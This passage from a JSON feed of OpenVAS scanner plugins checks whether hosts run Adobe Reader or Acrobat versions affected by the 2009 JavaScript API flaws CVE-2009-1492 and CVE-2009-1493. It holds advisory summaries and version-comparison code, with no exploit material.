string:readerVer);\n\nif(readerVer == NULL){\n exit(0);\n}\n\nif(version_is_less_equal(version:readerVer, test_version:\"9.1\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:13", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0478.\n\nAdobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nTwo flaws were discovered in Adobe Reader's JavaScript API. A PDF file\ncontaining malicious JavaScript instructions could cause Adobe Reader to\ncrash or, potentially, execute arbitrary code as the user running Adobe\nReader. (CVE-2009-1492, CVE-2009-1493)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 8.1.5, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.", "modified": "2017-07-12T00:00:00", "published": "2009-05-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63973", "id": "OPENVAS:63973", "title": "RedHat Security Advisory RHSA-2009:0478", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0478.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0478 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0478.\n\nAdobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nTwo flaws were discovered in Adobe Reader's JavaScript API. A PDF file\ncontaining malicious JavaScript instructions could cause Adobe Reader to\ncrash or, potentially, execute arbitrary code as the user running Adobe\nReader. (CVE-2009-1492, CVE-2009-1493)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 8.1.5, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(63973);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-20 00:17:15 +0200 (Wed, 20 May 2009)\");\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0478\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0478.html\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb09-06.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~2\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread-plugin\", rpm:\"acroread-plugin~8.1.5~2\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread-plugin\", rpm:\"acroread-plugin~8.1.5~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread-plugin\", rpm:\"acroread-plugin~8.1.5~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:38:33", "bulletinFamily": "scanner", "description": "Check for the Version of Adobe Acrobat Reader", "modified": "2018-04-06T00:00:00", "published": "2009-10-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855744", "id": "OPENVAS:1361412562310855744", "type": "openvas", "title": "Solaris Update for Adobe Acrobat Reader 121104-10", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Adobe Acrobat Reader 121104-10\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Adobe Acrobat Reader on solaris_5.10_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Adobe Acrobat Reader\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855744\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 15:16:45 +0200 (Tue, 13 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"121104-10\");\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n script_name(\"Solaris Update for Adobe Acrobat Reader 121104-10\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-121104-10-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Adobe Acrobat Reader\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"121104-10\", package:\"SUNWacroread\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:06", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:027.", "modified": "2018-04-06T00:00:00", "published": "2009-05-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064040", "id": "OPENVAS:136141256231064040", "title": "SuSE Security Advisory SUSE-SA:2009:027 (acroread)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_027.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:027 (acroread)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Adobe Acrobat Reader acroread received fixes for two\nvulnerabilities in the JavaScript API that allowed attackers\nto execute arbitrary code with a malformed PDF file.\n\n(CVE-2009-1492,CVE-2009-1493)\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:027\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:027.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64040\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-25 20:59:33 +0200 (Mon, 25 May 2009)\");\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:027 (acroread)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:10", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:027.", "modified": "2017-07-11T00:00:00", "published": "2009-05-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64040", "id": "OPENVAS:64040", "title": "SuSE Security Advisory SUSE-SA:2009:027 (acroread)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_027.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:027 (acroread)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Adobe Acrobat Reader acroread received fixes for two\nvulnerabilities in the JavaScript API that allowed attackers\nto execute arbitrary code with a malformed PDF file.\n\n(CVE-2009-1492,CVE-2009-1493)\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:027\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:027.\";\n\n \n\nif(description)\n{\n script_id(64040);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-25 20:59:33 +0200 (Mon, 25 May 2009)\");\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:027 (acroread)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:55", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0478.\n\nAdobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nTwo flaws were discovered in Adobe Reader's JavaScript API. A PDF file\ncontaining malicious JavaScript instructions could cause Adobe Reader to\ncrash or, potentially, execute arbitrary code as the user running Adobe\nReader. (CVE-2009-1492, CVE-2009-1493)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 8.1.5, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.", "modified": "2018-04-06T00:00:00", "published": "2009-05-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063973", "id": "OPENVAS:136141256231063973", "title": "RedHat Security Advisory RHSA-2009:0478", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0478.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0478 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0478.\n\nAdobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nTwo flaws were discovered in Adobe Reader's JavaScript API. A PDF file\ncontaining malicious JavaScript instructions could cause Adobe Reader to\ncrash or, potentially, execute arbitrary code as the user running Adobe\nReader. (CVE-2009-1492, CVE-2009-1493)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 8.1.5, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63973\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-20 00:17:15 +0200 (Wed, 20 May 2009)\");\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0478\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0478.html\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb09-06.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~2\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread-plugin\", rpm:\"acroread-plugin~8.1.5~2\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread-plugin\", rpm:\"acroread-plugin~8.1.5~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread-plugin\", rpm:\"acroread-plugin~8.1.5~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-04T13:43:45", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader/Acrobat and is prone to Denial of\n Service vulnerability.", "modified": "2018-12-03T00:00:00", "published": "2009-05-11T00:00:00", "id": "OPENVAS:1361412562310800706", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800706", "title": "Adobe Reader/Acrobat Denial of Service Vulnerability (May09)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_dos_vuln_may09_win.nasl 12629 2018-12-03 15:19:43Z cfischer $\n#\n# Adobe Reader/Acrobat Denial of Service Vulnerability (May09) (Windows)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800706\");\n script_version(\"$Revision: 12629 $\");\n script_cve_id(\"CVE-2009-1492\");\n script_bugtraq_id(34736);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-03 16:19:43 +0100 (Mon, 03 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-11 08:41:11 +0200 (Mon, 11 May 2009)\");\n script_name(\"Adobe Reader/Acrobat Denial of Service Vulnerability (May09)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader/Acrobat and is prone to Denial of\n Service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This flaw is due to memory corruption error in 'getAnnots' methods in the\n JavaScript API while processing malicious PDF files that calls this vulnerable\n method with crafted integer arguments.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker cause memory corruption or\n denial of service.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader/Acrobat version 9.1 and prior on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader/Acrobat version 9.3.2 or later.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/34924\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/50145\");\n script_xref(name:\"URL\", value:\"http://blogs.adobe.com/psirt/2009/04/update_on_adobe_reader_issue.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(readerVer = get_app_version(cpe:CPE, nofork:TRUE))\n{\n if(version_is_less_equal(version:readerVer, test_version:\"9.1\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n\nCPE = \"cpe:/a:adobe:acrobat\";\nif(acroVer = get_app_version(cpe:CPE))\n{\n if(version_is_less_equal(version:acroVer, test_version:\"9.1\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:50", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader and is prone to arbitrary\n code execution vulnerability.", "modified": "2017-12-21T00:00:00", "published": "2010-04-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=801303", "id": "OPENVAS:801303", "title": "Adobe Reader PDF Handling Code Execution Vulnerability (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_exe_code_exec_vuln_win.nasl 8210 2017-12-21 10:26:31Z cfischer $\n#\n# Adobe Reader PDF Handling Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\ntag_impact = \"Successful exploitation will allow attacker to execute arbitrary code via\n a crafted document.\n\n Impact level: System/Application.\";\n\ntag_affected = \"Adobe Reader version 8.x and 9.x on Windows.\";\n\ntag_insight = \"The flaw is due to error in handling 'PDF' files, which allows to execute\n 'EXE' files that are embedded in a PDF document.\";\n\ntag_solution = \"Upgrade to Adobe Reader version 9.3.2 or later,\n For further updates refer, http://www.adobe.com\";\n\ntag_summary = \"This host is installed with Adobe Reader and is prone to arbitrary\n code execution vulnerability.\";\n\nif(description)\n{\n script_id(801303);\n script_version(\"$Revision: 8210 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 11:26:31 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-07 16:20:50 +0200 (Wed, 07 Apr 2010)\");\n script_cve_id(\"CVE-2009-1492\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Reader PDF Handling Code Execution Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://lists.immunitysec.com/pipermail/dailydave/2010-April/006074.html\");\n script_xref(name : \"URL\" , value : \"http://lists.immunitysec.com/pipermail/dailydave/2010-April/006072.html\");\n script_xref(name : \"URL\" , value : \"https://forum.immunityinc.com/board/thread/1199/exploiting-pdf-files-without-vulnerabili/?page=1#post-1199\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Win/Installed\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = 